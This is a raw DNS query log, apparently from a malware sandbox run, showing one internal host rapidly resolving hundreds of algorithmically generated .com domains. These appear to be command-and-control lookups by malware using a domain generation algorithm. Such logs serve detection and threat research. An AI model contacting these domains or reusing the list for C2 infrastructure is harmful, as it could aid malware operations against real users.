Nov 11, 2024 18:13:22.544159889 CET	192.168.2.6	1.1.1.1	0x4e84	Standard query (0)	qetyfyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.544332027 CET	192.168.2.6	1.1.1.1	0x4752	Standard query (0)	gadynub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.544497013 CET	192.168.2.6	1.1.1.1	0x58ca	Standard query (0)	qedyfyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.544527054 CET	192.168.2.6	1.1.1.1	0xdab2	Standard query (0)	puvytuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.544779062 CET	192.168.2.6	1.1.1.1	0xe	Standard query (0)	purydel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.545032978 CET	192.168.2.6	1.1.1.1	0x3a91	Standard query (0)	purycaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.545213938 CET	192.168.2.6	1.1.1.1	0xa7ce	Standard query (0)	lygymod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.545368910 CET	192.168.2.6	1.1.1.1	0x2336	Standard query (0)	volykek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.545547009 CET	192.168.2.6	1.1.1.1	0xa018	Standard query (0)	vofymif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.545830011 CET	192.168.2.6	1.1.1.1	0xad3f	Standard query (0)	puzylyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.546058893 CET	192.168.2.6	1.1.1.1	0xf8a4	Standard query (0)	qexyreg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.546344042 CET	192.168.2.6	1.1.1.1	0xc874	Standard query (0)	gaqydaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.548073053 CET	192.168.2.6	1.1.1.1	0x7e9d	Standard query (0)	qegyqov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.562462091 CET	192.168.2.6	1.1.1.1	0x9ab6	Standard query (0)	qeqysap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.581590891 CET	192.168.2.6	1.1.1.1	0x3827	Standard query (0)	puvyxig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.586623907 CET	192.168.2.6	1.1.1.1	0x8d3b	Standard query (0)	gacyryb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.586875916 CET	192.168.2.6	1.1.1.1	0xe2af	Standard query (0)	lyxylyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.331721067 CET	192.168.2.6	1.1.1.1	0xef97	Standard query (0)	gahynuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.334357023 CET	192.168.2.6	1.1.1.1	0xf7a1	Standard query (0)	vocykec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.335275888 CET	192.168.2.6	1.1.1.1	0x7a1	Standard query (0)	qegynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.335540056 CET	192.168.2.6	1.1.1.1	0xc45e	Standard query (0)	purypig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.337018967 CET	192.168.2.6	1.1.1.1	0xcc	Standard query (0)	lyryson.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.345980883 CET	192.168.2.6	1.1.1.1	0xd908	Standard query (0)	gaqypuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.352008104 CET	192.168.2.6	1.1.1.1	0x60b1	Standard query (0)	qexykav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.356985092 CET	192.168.2.6	1.1.1.1	0xfcee	Standard query (0)	vowypim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.357126951 CET	192.168.2.6	1.1.1.1	0xd5cc	Standard query (0)	lyxyjod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.357640982 CET	192.168.2.6	1.1.1.1	0x5b80	Standard query (0)	vofybet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.367163897 CET	192.168.2.6	1.1.1.1	0xc3e1	Standard query (0)	puzymup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.368726015 CET	192.168.2.6	1.1.1.1	0x712e	Standard query (0)	vojymuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.368843079 CET	192.168.2.6	1.1.1.1	0xee8	Standard query (0)	qetysog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.375878096 CET	192.168.2.6	1.1.1.1	0x9203	Standard query (0)	qexyqip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.376265049 CET	192.168.2.6	1.1.1.1	0x4727	Standard query (0)	qetyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.384516954 CET	192.168.2.6	1.1.1.1	0xaa35	Standard query (0)	gahyfyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.389705896 CET	192.168.2.6	1.1.1.1	0xfcd3	Standard query (0)	vocyqot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.398964882 CET	192.168.2.6	1.1.1.1	0x2806	Standard query (0)	puvylep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.400415897 CET	192.168.2.6	1.1.1.1	0x7820	Standard query (0)	gaqyzyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.400742054 CET	192.168.2.6	1.1.1.1	0x31d0	Standard query (0)	qebyrel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.400926113 CET	192.168.2.6	1.1.1.1	0x92b7	Standard query (0)	ganyrew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.401094913 CET	192.168.2.6	1.1.1.1	0xa150	Standard query (0)	lykygun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.406253099 CET	192.168.2.6	1.1.1.1	0x6f15	Standard query (0)	qeqytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.406253099 CET	192.168.2.6	1.1.1.1	0x151a	Standard query (0)	puzyjov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.406503916 CET	192.168.2.6	1.1.1.1	0x98fc	Standard query (0)	pupydev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.406653881 CET	192.168.2.6	1.1.1.1	0x3d2c	Standard query (0)	lyvylyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.406697989 CET	192.168.2.6	1.1.1.1	0x9e49	Standard query (0)	ganyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.406723022 CET	192.168.2.6	1.1.1.1	0xe76b	Standard query (0)	lymytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.406904936 CET	192.168.2.6	1.1.1.1	0x30ef	Standard query (0)	lygyfej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.459834099 CET	192.168.2.6	1.1.1.1	0xb8f7	Standard query (0)	lykymij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.461818933 CET	192.168.2.6	1.1.1.1	0xe63f	Standard query (0)	pujymiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.462519884 CET	192.168.2.6	1.1.1.1	0x3545	Standard query (0)	vonyzut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.462861061 CET	192.168.2.6	1.1.1.1	0xa6df	Standard query (0)	gatydab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.463093996 CET	192.168.2.6	1.1.1.1	0xf84e	Standard query (0)	lyvywar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.463407040 CET	192.168.2.6	1.1.1.1	0x813	Standard query (0)	lyryxud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.465440989 CET	192.168.2.6	1.1.1.1	0x65fe	Standard query (0)	volyjif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.479721069 CET	192.168.2.6	1.1.1.1	0xb49c	Standard query (0)	pumytyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480014086 CET	192.168.2.6	1.1.1.1	0x6379	Standard query (0)	qedyvap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480221987 CET	192.168.2.6	1.1.1.1	0xc6cc	Standard query (0)	galyhib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480267048 CET	192.168.2.6	1.1.1.1	0x1136	Standard query (0)	lysyvax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480458975 CET	192.168.2.6	1.1.1.1	0x631b	Standard query (0)	gatycis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480643988 CET	192.168.2.6	1.1.1.1	0x61d2	Standard query (0)	vopycoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480643988 CET	192.168.2.6	1.1.1.1	0xcb31	Standard query (0)	puvywal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480664968 CET	192.168.2.6	1.1.1.1	0x5a4e	Standard query (0)	puryxuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480874062 CET	192.168.2.6	1.1.1.1	0xe87b	Standard query (0)	vojygym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.480874062 CET	192.168.2.6	1.1.1.1	0x1bed	Standard query (0)	pujygug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481028080 CET	192.168.2.6	1.1.1.1	0xb238	Standard query (0)	vowyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481081963 CET	192.168.2.6	1.1.1.1	0x599e	Standard query (0)	qekyqoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481209040 CET	192.168.2.6	1.1.1.1	0x3bdd	Standard query (0)	lyxymix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481273890 CET	192.168.2.6	1.1.1.1	0xffdf	Standard query (0)	gadyvez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481410980 CET	192.168.2.6	1.1.1.1	0xf3ed	Standard query (0)	pufybyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481456995 CET	192.168.2.6	1.1.1.1	0xed86	Standard query (0)	qegyfeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481594086 CET	192.168.2.6	1.1.1.1	0x41e0	Standard query (0)	qeqylyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481681108 CET	192.168.2.6	1.1.1.1	0x6fdb	Standard query (0)	vopydaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.481762886 CET	192.168.2.6	1.1.1.1	0x32c	Standard query (0)	gacyqoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.485035896 CET	192.168.2.6	1.1.1.1	0xba3c	Standard query (0)	vonyryk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.487504959 CET	192.168.2.6	1.1.1.1	0x38d9	Standard query (0)	gacykas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.487771034 CET	192.168.2.6	1.1.1.1	0x3fac	Standard query (0)	pufydaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.487945080 CET	192.168.2.6	1.1.1.1	0x972	Standard query (0)	pupycop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.489305973 CET	192.168.2.6	1.1.1.1	0xeb10	Standard query (0)	qekyhug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.490190029 CET	192.168.2.6	1.1.1.1	0xf097	Standard query (0)	vofydak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.491113901 CET	192.168.2.6	1.1.1.1	0xf46f	Standard query (0)	gadydow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.492417097 CET	192.168.2.6	1.1.1.1	0x917b	Standard query (0)	qebylyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.492417097 CET	192.168.2.6	1.1.1.1	0x7c6d	Standard query (0)	lygynyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.993072987 CET	192.168.2.6	1.1.1.1	0xc477	Standard query (0)	pupypil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.995398998 CET	192.168.2.6	1.1.1.1	0x1838	Standard query (0)	lykynyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.996541977 CET	192.168.2.6	1.1.1.1	0xcfb	Standard query (0)	qedysol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.996728897 CET	192.168.2.6	1.1.1.1	0x9e19	Standard query (0)	ganykah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:23.997545004 CET	192.168.2.6	1.1.1.1	0x8898	Standard query (0)	qekynyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.001290083 CET	192.168.2.6	1.1.1.1	0x1664	Standard query (0)	gadycih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.019299984 CET	192.168.2.6	1.1.1.1	0x4a4f	Standard query (0)	lysysir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.019475937 CET	192.168.2.6	1.1.1.1	0xd3b9	Standard query (0)	lymylen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.019608021 CET	192.168.2.6	1.1.1.1	0xfb5a	Standard query (0)	vofycim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.031068087 CET	192.168.2.6	1.1.1.1	0x88d1	Standard query (0)	puzygyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.031466007 CET	192.168.2.6	1.1.1.1	0x7c4e	Standard query (0)	vonykam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.040940046 CET	192.168.2.6	1.1.1.1	0x6cdc	Standard query (0)	lykyfax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.047615051 CET	192.168.2.6	1.1.1.1	0x8f6f	Standard query (0)	vopyzyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.047782898 CET	192.168.2.6	1.1.1.1	0xe200	Standard query (0)	ganyqib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.047957897 CET	192.168.2.6	1.1.1.1	0x5d5	Standard query (0)	pupyxuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.048141003 CET	192.168.2.6	1.1.1.1	0x4ded	Standard query (0)	lysyxuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.048532963 CET	192.168.2.6	1.1.1.1	0x7bf2	Standard query (0)	vonyqof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.049130917 CET	192.168.2.6	1.1.1.1	0xcf93	Standard query (0)	galyfez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.049990892 CET	192.168.2.6	1.1.1.1	0x636f	Standard query (0)	qekyfep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.053244114 CET	192.168.2.6	1.1.1.1	0xf3cc	Standard query (0)	qedyxuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.053286076 CET	192.168.2.6	1.1.1.1	0x9827	Standard query (0)	pumywov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.053908110 CET	192.168.2.6	1.1.1.1	0x146a	Standard query (0)	purytyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.054091930 CET	192.168.2.6	1.1.1.1	0xb8f2	Standard query (0)	qexynyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.055166960 CET	192.168.2.6	1.1.1.1	0x5715	Standard query (0)	qebyqig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.065259933 CET	192.168.2.6	1.1.1.1	0x916c	Standard query (0)	gaqyres.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.065427065 CET	192.168.2.6	1.1.1.1	0x5265	Standard query (0)	vowyrec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.065562963 CET	192.168.2.6	1.1.1.1	0xe7f8	Standard query (0)	lyxygur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.065689087 CET	192.168.2.6	1.1.1.1	0x106a	Standard query (0)	gacyhuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.069307089 CET	192.168.2.6	1.1.1.1	0xcbcc	Standard query (0)	lygyvon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.069528103 CET	192.168.2.6	1.1.1.1	0x72b8	Standard query (0)	qegyvag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.070024014 CET	192.168.2.6	1.1.1.1	0xd22f	Standard query (0)	lymywad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.070595980 CET	192.168.2.6	1.1.1.1	0x1aef	Standard query (0)	gahyvab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.070928097 CET	192.168.2.6	1.1.1.1	0x686e	Standard query (0)	pujydap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.071105003 CET	192.168.2.6	1.1.1.1	0x79d5	Standard query (0)	gatyzyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.071130991 CET	192.168.2.6	1.1.1.1	0xb50f	Standard query (0)	puvyjiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.071434975 CET	192.168.2.6	1.1.1.1	0xab9c	Standard query (0)	qetytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.071600914 CET	192.168.2.6	1.1.1.1	0x89e3	Standard query (0)	volygyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.071619987 CET	192.168.2.6	1.1.1.1	0x32d4	Standard query (0)	pumyleg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.071773052 CET	192.168.2.6	1.1.1.1	0xce3e	Standard query (0)	vojydoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.071963072 CET	192.168.2.6	1.1.1.1	0x6c03	Standard query (0)	lyvymun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.072037935 CET	192.168.2.6	1.1.1.1	0xab1a	Standard query (0)	gahydos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.072139025 CET	192.168.2.6	1.1.1.1	0xc741	Standard query (0)	lyryler.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.072237968 CET	192.168.2.6	1.1.1.1	0xc9fa	Standard query (0)	vocymum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.072560072 CET	192.168.2.6	1.1.1.1	0x89d3	Standard query (0)	purylal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.077066898 CET	192.168.2.6	1.1.1.1	0xb3a5	Standard query (0)	qegysiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.077099085 CET	192.168.2.6	1.1.1.1	0x574c	Standard query (0)	gacynyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.077290058 CET	192.168.2.6	1.1.1.1	0x9dcb	Standard query (0)	vowykat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.077455044 CET	192.168.2.6	1.1.1.1	0x386c	Standard query (0)	qebykoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.078195095 CET	192.168.2.6	1.1.1.1	0x67da	Standard query (0)	qeqyrav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.091228962 CET	192.168.2.6	1.1.1.1	0x5a01	Standard query (0)	puvymug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.092242956 CET	192.168.2.6	1.1.1.1	0xe919	Standard query (0)	vopyput.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.093276978 CET	192.168.2.6	1.1.1.1	0x6589	Standard query (0)	gatypuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.094023943 CET	192.168.2.6	1.1.1.1	0xadbf	Standard query (0)	vojybef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.094507933 CET	192.168.2.6	1.1.1.1	0x506b	Standard query (0)	pufypuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.094858885 CET	192.168.2.6	1.1.1.1	0xa6bb	Standard query (0)	qexyhul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.095326900 CET	192.168.2.6	1.1.1.1	0x2f74	Standard query (0)	pufycog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.095732927 CET	192.168.2.6	1.1.1.1	0x2030	Standard query (0)	lyvyjoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.096141100 CET	192.168.2.6	1.1.1.1	0x927	Standard query (0)	vocyjik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.096286058 CET	192.168.2.6	1.1.1.1	0xa6cf	Standard query (0)	volymuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.097125053 CET	192.168.2.6	1.1.1.1	0xfa75	Standard query (0)	galynus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.122879028 CET	192.168.2.6	1.1.1.1	0xefb	Standard query (0)	lyrytyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.123552084 CET	192.168.2.6	1.1.1.1	0xaa7	Standard query (0)	qetylel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.124219894 CET	192.168.2.6	1.1.1.1	0xe371	Standard query (0)	lygysid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.124783039 CET	192.168.2.6	1.1.1.1	0x55a3	Standard query (0)	pujybev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.306117058 CET	192.168.2.6	1.1.1.1	0x70d0	Standard query (0)	gaqykoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.352463961 CET	192.168.2.6	1.1.1.1	0x8771	Standard query (0)	vowyqik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.352889061 CET	192.168.2.6	1.1.1.1	0xeaaf	Standard query (0)	lygyxux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.353147984 CET	192.168.2.6	1.1.1.1	0x9d05	Standard query (0)	gacyfeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.353780031 CET	192.168.2.6	1.1.1.1	0x67a8	Standard query (0)	gahycuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.364428043 CET	192.168.2.6	1.1.1.1	0xe7da	Standard query (0)	pupyteg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.429524899 CET	192.168.2.6	1.1.1.1	0x4e6c	Standard query (0)	vocygef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.430450916 CET	192.168.2.6	1.1.1.1	0xf4a5	Standard query (0)	gaqykoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.451035023 CET	192.168.2.6	1.1.1.1	0x7027	Standard query (0)	pupyteg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.492595911 CET	192.168.2.6	1.1.1.1	0x4f82	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.544589996 CET	192.168.2.6	1.1.1.1	0x461d	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.577333927 CET	192.168.2.6	1.1.1.1	0xe3b9	Standard query (0)	qexyfag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.577605009 CET	192.168.2.6	1.1.1.1	0xc4e4	Standard query (0)	qeqyqul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.577912092 CET	192.168.2.6	1.1.1.1	0x9b1c	Standard query (0)	puzydog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.578099966 CET	192.168.2.6	1.1.1.1	0x9b93	Standard query (0)	qekyvol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.578514099 CET	192.168.2.6	1.1.1.1	0xc89	Standard query (0)	lysytyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.578824043 CET	192.168.2.6	1.1.1.1	0xf84	Standard query (0)	galyvaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.579011917 CET	192.168.2.6	1.1.1.1	0xc8d2	Standard query (0)	pumyjip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.579291105 CET	192.168.2.6	1.1.1.1	0x564	Standard query (0)	qedytyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.579472065 CET	192.168.2.6	1.1.1.1	0x8ddc	Standard query (0)	volybak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.579946995 CET	192.168.2.6	1.1.1.1	0x11ba	Standard query (0)	lymyjix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.580118895 CET	192.168.2.6	1.1.1.1	0xa300	Standard query (0)	gadypub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.584762096 CET	192.168.2.6	1.1.1.1	0x1b9f	Standard query (0)	purywoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.584958076 CET	192.168.2.6	1.1.1.1	0x1c26	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.585444927 CET	192.168.2.6	1.1.1.1	0xa7e8	Standard query (0)	vofypuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.586327076 CET	192.168.2.6	1.1.1.1	0x81d7	Standard query (0)	qetyraq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.600322962 CET	192.168.2.6	1.1.1.1	0xa7fe	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.600658894 CET	192.168.2.6	1.1.1.1	0xcb8c	Standard query (0)	vopyrem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.601269007 CET	192.168.2.6	1.1.1.1	0xa66f	Standard query (0)	qeqykop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.601499081 CET	192.168.2.6	1.1.1.1	0x579b	Standard query (0)	gaqyqiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.601644039 CET	192.168.2.6	1.1.1.1	0x4a0c	Standard query (0)	lyxyfan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.602631092 CET	192.168.2.6	1.1.1.1	0xbd88	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.608033895 CET	192.168.2.6	1.1.1.1	0x7dc7	Standard query (0)	qegyxup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.608212948 CET	192.168.2.6	1.1.1.1	0xfa3c	Standard query (0)	puvygyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.608509064 CET	192.168.2.6	1.1.1.1	0x8891	Standard query (0)	lykyvor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.608972073 CET	192.168.2.6	1.1.1.1	0xf799	Standard query (0)	ganyhus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.609133959 CET	192.168.2.6	1.1.1.1	0xc851	Standard query (0)	pufyxyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.617588043 CET	192.168.2.6	1.1.1.1	0xceb6	Standard query (0)	vonyjuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.618006945 CET	192.168.2.6	1.1.1.1	0xc214	Standard query (0)	lyvygyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.618648052 CET	192.168.2.6	1.1.1.1	0xce36	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.619776964 CET	192.168.2.6	1.1.1.1	0xbc6c	Standard query (0)	qebyhuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.621510983 CET	192.168.2.6	1.1.1.1	0x1b93	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.622495890 CET	192.168.2.6	1.1.1.1	0xe377	Standard query (0)	lyrywoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.622875929 CET	192.168.2.6	1.1.1.1	0x8f8e	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.623488903 CET	192.168.2.6	1.1.1.1	0x756b	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
